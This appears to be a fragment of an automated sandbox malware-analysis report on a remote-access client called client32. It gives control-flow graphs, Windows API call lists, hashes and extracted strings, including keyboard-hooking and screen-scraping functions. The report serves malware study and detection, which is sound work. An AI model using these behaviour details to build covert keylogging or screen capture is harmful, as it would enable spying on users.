                                                                                                                • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                                                • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                                • API String ID: 263027137-1001504656
                                                                                                                • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                                • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                                                • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                                • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2057 1102e199 2058 1102e1a0-1102e1b1 2057->2058 2058->2058 2059 1102e1b3 2058->2059 2060 1102e2f4-1102e30d call 11143690 2059->2060 2063 1102e313-1102e315 2060->2063 2064 1102e190-1102e193 2060->2064 2065 1102e413-1102e42d call 11146fe0 2063->2065 2066 1102e31b-1102e321 2063->2066 2067 1102e195-1102e197 2064->2067 2068 1102e1b8-1102e1c1 2064->2068 2089 1102e483-1102e48f call 1102bc40 2065->2089 2090 1102e42f-1102e448 call 1105e820 2065->2090 2071 1102e323-1102e332 call 11145990 2066->2071 2072 1102e338-1102e348 2066->2072 2067->2058 2068->2060 2069 1102e1c7-1102e1ce 2068->2069 2069->2060 2075 1102e2c3-1102e2d8 call 11163ca7 2069->2075 2076 1102e1d5-1102e1d7 2069->2076 2077 1102e2da-1102e2ef call 11163ca7 2069->2077 2078 1102e26a-1102e29d call 11162777 call 11142e60 2069->2078 2079 1102e2ab-1102e2c1 call 11164ed0 2069->2079 2080 1102e25b-1102e265 2069->2080 2081 1102e29f-1102e2a9 2069->2081 2082 1102e21c-1102e222 2069->2082 2083 1102e24c-1102e256 2069->2083 2071->2072 2073 1102e34a 2072->2073 2074 1102e34f-1102e36d call 1102d360 2072->2074 2073->2074 2074->2065 2107 1102e373-1102e398 call 110b7df0 call 11147060 2074->2107 2075->2060 2076->2060 2093 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2076->2093 2077->2060 2078->2060 2079->2060 2080->2060 2081->2060 2094 1102e224-1102e238 call 11163ca7 2082->2094 2095 1102e23d-1102e247 2082->2095 2083->2060 2113 1102e491-1102e498 2089->2113 2114 1102e468-1102e46f 2089->2114 2090->2089 2112 1102e44a-1102e45c 2090->2112 2093->2060 2094->2060 2095->2060 2141 1102e3a3-1102e3a9 2107->2141 2142 1102e39a-1102e3a1 2107->2142 2112->2089 2135 1102e45e 2112->2135 2118 1102e475-1102e478 2113->2118 2119 1102e49a-1102e4a4 2113->2119 2114->2118 2121 1102e67a-1102e69b GetComputerNameA 2114->2121 2124 1102e47a-1102e481 call 110b7df0 2118->2124 2125 1102e4a9 2118->2125 2119->2121 2129 1102e6d3-1102e6d9 2121->2129 2130 1102e69d-1102e6d1 call 11028230 2121->2130 2133 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2124->2133 2125->2133 2131 1102e6db-1102e6e0 2129->2131 2132 1102e70f-1102e722 call 11164ed0 2129->2132 2130->2129 2159 1102e727-1102e733 2130->2159 2138 1102e6e6-1102e6ea 2131->2138 2156 1102e917-1102e93a 2132->2156 2189 1102e64a-1102e652 SetLastError 2133->2189 2190 1102e58c-1102e5a3 2133->2190 2135->2114 2145 1102e706-1102e708 2138->2145 2146 1102e6ec-1102e6ee 2138->2146 2147 1102e3ab-1102e3b2 call 11028360 2141->2147 2148 1102e409 2141->2148 2142->2065 2152 1102e70b-1102e70d 2145->2152 2153 1102e702-1102e704 2146->2153 2154 1102e6f0-1102e6f6 2146->2154 2147->2148 2163 1102e3b4-1102e3e6 2147->2163 2148->2065 2152->2132 2152->2159 2153->2152 2154->2145 2160 1102e6f8-1102e700 2154->2160 2169 1102e962-1102e96a 2156->2169 2170 1102e93c-1102e942 2156->2170 2164 1102e735-1102e74a call 110b7df0 call 1102a1f0 2159->2164 2165 1102e74c-1102e75f call 11081d30 2159->2165 2160->2138 2160->2153 2181 1102e3f0-1102e3ff call 110f64d0 2163->2181 2182 1102e3e8-1102e3ee 2163->2182 2199 1102e7a3-1102e7bc call 11081d30 2164->2199 2186 1102e761-1102e784 2165->2186 2187 1102e786-1102e788 2165->2187 2174 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2169->2174 2175 1102e96c-1102e979 call 11036710 call 11162777 2169->2175 2170->2169 2179 1102e944-1102e95d call 1102d900 2170->2179 2175->2174 2179->2169 2193 1102e402-1102e404 call 1102d900 2181->2193 2182->2181 2182->2193 2186->2199 2191 1102e790-1102e7a1 2187->2191 2197 1102e613-1102e61f 2189->2197 2190->2197 2212 1102e5a5-1102e5ae 2190->2212 2191->2191 2191->2199 2193->2148 2205 1102e662-1102e671 2197->2205 2206 1102e621-1102e62d 2197->2206 2219 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2199->2219 2220 1102e8fc-1102e909 call 11164ed0 2199->2220 2205->2121 2215 1102e673-1102e674 FreeLibrary 2205->2215 2213 1102e63f-1102e643 2206->2213 2214 1102e62f-1102e63d GetProcAddress 2206->2214 2212->2197 2221 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2212->2221 2217 1102e654-1102e656 SetLastError 2213->2217 2218 1102e645-1102e648 2213->2218 2214->2213 2215->2121 2223 1102e65c 2217->2223 2218->2223 2257 1102e853-1102e869 call 11129e00 2219->2257 2258 1102e83f-1102e84e call 11029a70 2219->2258 2236 1102e90c-1102e911 CharUpperA 2220->2236 2221->2197 2242 1102e5e8-1102e60e call 11147060 call 11027f80 2221->2242 2223->2205 2236->2156 2242->2197 2262 1102e882-1102e8bc call 110d0e20 * 2 2257->2262 2263 1102e86b-1102e87d call 110d0e20 2257->2263 2258->2257 2270 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 2262->2270 2271 1102e8be-1102e8cd call 11029a70 2262->2271 2263->2262 2270->2236 2271->2270
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: $124406$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                • API String ID: 1029625771-4090447958
                                                                                                                • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                                • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                                                • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                                • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2277 11142010-11142051 call 11147060 2280 11142057-111420b3 LoadLibraryA 2277->2280 2281 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2277->2281 2282 111420b5-111420c0 call 11017a40 2280->2282 2283 111420c7-111420d0 2280->2283 2292 11142105-1114210b 2281->2292 2293 11142133 2281->2293 2282->2283 2290 111420c2 call 110ccc90 2282->2290 2283->2281 2286 111420d2-111420d3 FreeLibrary 2283->2286 2286->2281 2290->2283 2292->2293 2295 1114210d-11142113 2292->2295 2296 1114213d-1114215d GetClassInfoExA 2293->2296 2295->2293 2297 11142115-11142131 call 1105e820 2295->2297 2298 11142163-1114218a call 11162be0 call 11145080 2296->2298 2299 111421fe-11142256 2296->2299 2297->2296 2308 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2298->2308 2309 1114218c-111421a0 call 11029a70 2298->2309 2310 11142292-11142298 2299->2310 2311 11142258-1114225e 2299->2311 2308->2299 2333 111421e7-111421fb call 11029a70 2308->2333 2309->2308 2313 111422d4-111422f6 call 1105e820 2310->2313 2314 1114229a-111422a9 call 111101b0 2310->2314 2311->2310 2316 11142260-11142266 2311->2316 2330 11142304-11142309 2313->2330 2331 111422f8-11142302 2313->2331 2328 111422cd 2314->2328 2329 111422ab-111422cb 2314->2329 2316->2310 2321 11142268-1114227f call 1112d770 LoadLibraryA 2316->2321 2321->2310 2332 11142281-1114228d GetProcAddress 2321->2332 2334 111422cf 2328->2334 2329->2334 2335 11142315-1114231b 2330->2335 2336 1114230b 2330->2336 2331->2335 2332->2310 2333->2299 2334->2313 2337 1114231d-11142323 call 110f8230 2335->2337 2338 11142328-11142341 call 1113d9a0 2335->2338 2336->2335 2337->2338 2345 11142347-1114234d 2338->2345 2346 111423e9-111423fa 2338->2346 2347 1114234f-11142361 call 111101b0 2345->2347 2348 11142389-1114238f 2345->2348 2359 11142363-11142374 call 1115e590 2347->2359 2360 1114237b 2347->2360 2349 111423b5-111423c1 2348->2349 2350 11142391-11142397 2348->2350 2354 111423c3-111423c9 2349->2354 2355 111423d8-111423e3 #17 LoadLibraryA 2349->2355 2352 1114239e-111423b0 SetTimer 2350->2352 2353 11142399 call 11135840 2350->2353 2352->2349 2353->2352 2354->2355 2358 111423cb-111423d1 2354->2358 2355->2346 2358->2355 2361 111423d3 call 1112e5e0 2358->2361 2365 11142379 2359->2365 2363 1114237d-11142384 2360->2363 2361->2355 2363->2348 2365->2363
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                                                • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                                                • _memset.LIBCMT ref: 11142169
                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                                                • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                                                • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                                                • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                                                • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                                                • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                                                  • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0BAD89F8,11030346,00000000), ref: 11017A6E
                                                                                                                  • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                                  • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                                  • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                                  • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                                                  • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                • API String ID: 3706574701-3145203681
                                                                                                                • Opcode ID: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
                                                                                                                • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                                                • Opcode Fuzzy Hash: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
                                                                                                                • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2366 11028c10-11028c2d 2367 11028c33-11028c62 2366->2367 2368 110292f8-110292ff 2366->2368 2369 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2367->2369 2370 11028c68-11028c6e 2367->2370 2371 11029311-11029315 2368->2371 2372 11029301-1102930a 2368->2372 2386 11028d3d 2369->2386 2373 11028c70-11028c78 2370->2373 2375 11029317-11029329 call 11162bb7 2371->2375 2376 1102932a-1102933e call 11162bb7 2371->2376 2372->2371 2374 1102930c 2372->2374 2373->2373 2379 11028c7a-11028c80 2373->2379 2374->2371 2383 11028c83-11028c88 2379->2383 2383->2383 2387 11028c8a-11028c94 2383->2387 2388 11028d40-11028d4a 2386->2388 2389 11028cb1-11028cb7 2387->2389 2390 11028c96-11028c9d 2387->2390 2391 11028d50-11028d53 2388->2391 2392 110292ef-110292f7 2388->2392 2394 11028cb8-11028cbe 2389->2394 2393 11028ca0-11028ca6 2390->2393 2391->2392 2395 11028d59-11028d67 call 11026ef0 2391->2395 2392->2368 2393->2393 2396 11028ca8-11028cae 2393->2396 2394->2394 2397 11028cc0-11028cee call 11164ead 2394->2397 2402 11029275-1102928a call 11164c77 2395->2402 2403 11028d6d-11028d80 call 11163ca7 2395->2403 2396->2389 2397->2388 2402->2392 2408 11029290-110292ea 2402->2408 2409 11028d82-11028d85 2403->2409 2410 11028d8b-11028db3 call 11026d60 call 11026ef0 2403->2410 2408->2392 2409->2402 2409->2410 2410->2402 2415 11028db9-11028dd6 call 11026fe0 call 11026ef0 2410->2415 2420 110291e5-110291ec 2415->2420 2421 11028ddc 2415->2421 2422 11029212-11029219 2420->2422 2423 110291ee-110291f1 2420->2423 2424 11028de0-11028e00 call 11026d60 2421->2424 2426 11029231-11029238 2422->2426 2427 1102921b-11029221 2422->2427 2423->2422 2425 110291f3-110291fa 2423->2425 2436 11028e02-11028e05 2424->2436 2437 11028e36-11028e39 2424->2437 2429 11029200-11029210 2425->2429 2431 1102923a-11029245 2426->2431 2432 11029248-1102924f 2426->2432 2430 11029227-1102922f 2427->2430 2429->2422 2429->2429 2430->2426 2430->2430 2431->2432 2434 11029251-1102925b 2432->2434 2435 1102925e-11029265 2432->2435 2434->2435 2435->2402 2442 11029267-11029272 2435->2442 2440 11028e07-11028e0e 2436->2440 2441 11028e1e-11028e21 2436->2441 2438 110291ce-110291df call 11026ef0 2437->2438 2439 11028e3f-11028e52 call 11165010 2437->2439 2438->2420 2438->2424 2439->2438 2449 11028e58-11028e74 call 1116558e 2439->2449 2444 11028e14-11028e1c 2440->2444 2441->2438 2446 11028e27-11028e31 2441->2446 2442->2402 2444->2441 2444->2444 2446->2438 2452 11028e76-11028e7c 2449->2452 2453 11028e8f-11028ea5 call 1116558e 2449->2453 2454 11028e80-11028e88 2452->2454 2458 11028ea7-11028ead 2453->2458 2459 11028ebf-11028ed5 call 1116558e 2453->2459 2454->2454 2456 11028e8a 2454->2456 2456->2438 2461 11028eb0-11028eb8 2458->2461 2464 11028ed7-11028edd 2459->2464 2465 11028eef-11028f05 call 1116558e 2459->2465 2461->2461 2463 11028eba 2461->2463 2463->2438 2466 11028ee0-11028ee8 2464->2466 2470 11028f07-11028f0d 2465->2470 2471 11028f1f-11028f35 call 1116558e 2465->2471 2466->2466 2468 11028eea 2466->2468 2468->2438 2472 11028f10-11028f18 2470->2472 2476 11028f37-11028f3d 2471->2476 2477 11028f4f-11028f65 call 1116558e 2471->2477 2472->2472 2474 11028f1a 2472->2474 2474->2438 2479 11028f40-11028f48 2476->2479 2482 11028f67-11028f6d 2477->2482 2483 11028f7f-11028f95 call 1116558e 2477->2483 2479->2479 2480 11028f4a 2479->2480 2480->2438 2484 11028f70-11028f78 2482->2484 2488 11028f97-11028f9d 2483->2488 2489 11028faf-11028fc5 call 1116558e 2483->2489 2484->2484 2486 11028f7a 2484->2486 2486->2438 2490 11028fa0-11028fa8 2488->2490 2494 11028fc7-11028fcd 2489->2494 2495 11028fdf-11028ff5 call 1116558e 2489->2495 2490->2490 2492 11028faa 2490->2492 2492->2438 2496 11028fd0-11028fd8 2494->2496 2500 11028ff7-11028ffd 2495->2500 2501 1102900f-11029025 call 1116558e 2495->2501 2496->2496 2498 11028fda 2496->2498 2498->2438 2502 11029000-11029008 2500->2502 2506 11029027-1102902d 2501->2506 2507 1102903f-11029055 call 1116558e 2501->2507 2502->2502 2504 1102900a 2502->2504 2504->2438 2509 11029030-11029038 2506->2509 2512 11029057-1102905d 2507->2512 2513 1102906f-11029085 call 1116558e 2507->2513 2509->2509 2511 1102903a 2509->2511 2511->2438 2514 11029060-11029068 2512->2514 2518 110290a6-110290bc call 1116558e 2513->2518 2519 11029087-1102908d 2513->2519 2514->2514 2516 1102906a 2514->2516 2516->2438 2524 110290d3-110290e9 call 1116558e 2518->2524 2525 110290be 2518->2525 2520 11029097-1102909f 2519->2520 2520->2520 2522 110290a1 2520->2522 2522->2438 2530 11029100-11029116 call 1116558e 2524->2530 2531 110290eb 2524->2531 2527 110290c4-110290cc 2525->2527 2527->2527 2528 110290ce 2527->2528 2528->2438 2536 11029137-1102914d call 1116558e 2530->2536 2537 11029118-1102911e 2530->2537 2532 110290f1-110290f9 2531->2532 2532->2532 2534 110290fb 2532->2534 2534->2438 2542 1102916f-11029185 call 1116558e 2536->2542 2543 1102914f-1102915f 2536->2543 2538 11029128-11029130 2537->2538 2538->2538 2540 11029132 2538->2540 2540->2438 2548 11029187-1102918d 2542->2548 2549 1102919c-110291b2 call 1116558e 2542->2549 2544 11029160-11029168 2543->2544 2544->2544 2546 1102916a 2544->2546 2546->2438 2550 11029190-11029198 2548->2550 2549->2438 2554 110291b4-110291ba 2549->2554 2550->2550 2552 1102919a 2550->2552 2552->2438 2555 110291c4-110291cc 2554->2555 2555->2438 2555->2555
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73C61370,?,0000001A), ref: 11028CFD
                                                                                                                • _strrchr.LIBCMT ref: 11028D0C
                                                                                                                  • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                • API String ID: 1609618855-357498123
                                                                                                                • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                                                • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                                                • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2556 11030ef3-11030f1a RegOpenKeyExA 2557 11030f20-11030f4f call 11143bd0 2556->2557 2558 1103103d-1103105b 2556->2558 2567 11031030-11031037 RegCloseKey 2557->2567 2568 11030f55-11030f72 call 11163ca7 call 111648ed 2557->2568 2561 11031061-1103107b 2558->2561 2562 11031135-1103113f 2558->2562 2564 11031081-1103109f call 111101b0 call 11109bc0 2561->2564 2562->2564 2565 11031145-11031168 call 111101b0 call 110fae60 2562->2565 2584 110310a4-110312d6 2564->2584 2588 110312db-1103131f GetStockObject GetObjectA 2565->2588 2567->2558 2581 11030f86-11030f89 2568->2581 2582 11030f74-11030f84 call 111648ed 2568->2582 2586 11030f8b 2581->2586 2587 11030f8c-11030f98 call 11163ca7 2581->2587 2582->2581 2584->2588 2586->2587 2587->2567 2597 11030f9e-11030faa 2587->2597 2593 11031321 2588->2593 2594 1103132b-11031497 SetErrorMode * 2 call 111101b0 call 11028980 call 111101b0 call 11028980 InterlockedExchange call 111101b0 call 1108a880 GetACP call 11163f93 call 111663a3 call 11143770 call 11143780 call 111101b0 call 11061aa0 2588->2594 2593->2594 2637 11031499 2594->2637 2638 1103149f-110314a5 2594->2638 2597->2567 2599 11030fb0-11030fb3 2597->2599 2599->2567 2601 11030fb5-1103100c call 11143bd0 * 2 2599->2601 2608 11031011-1103101c 2601->2608 2608->2567 2610 1103101e-1103102a 2608->2610 2610->2567 2637->2638 2639 110314e1-110315f6 call 110ccc90 call 111101b0 call 11125d40 call 11114fb0 call 111101b0 call 11088b30 call 111101b0 call 1105cdb0 call 11110270 call 1105d1a0 call 11027810 call 1100d620 2638->2639 2640 110314a7-110314dc call 111101b0 call 11061710 2638->2640 2681 11031749-11031776 call 110edb10 call 11162bb7 2639->2681 2682 110315fc-11031610 call 1100d330 call 11147060 2639->2682 2640->2639 2682->2681
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                                                                • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                                • InterlockedExchange.KERNEL32(02AE8E08,00001388), ref: 110313BA
                                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A38400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
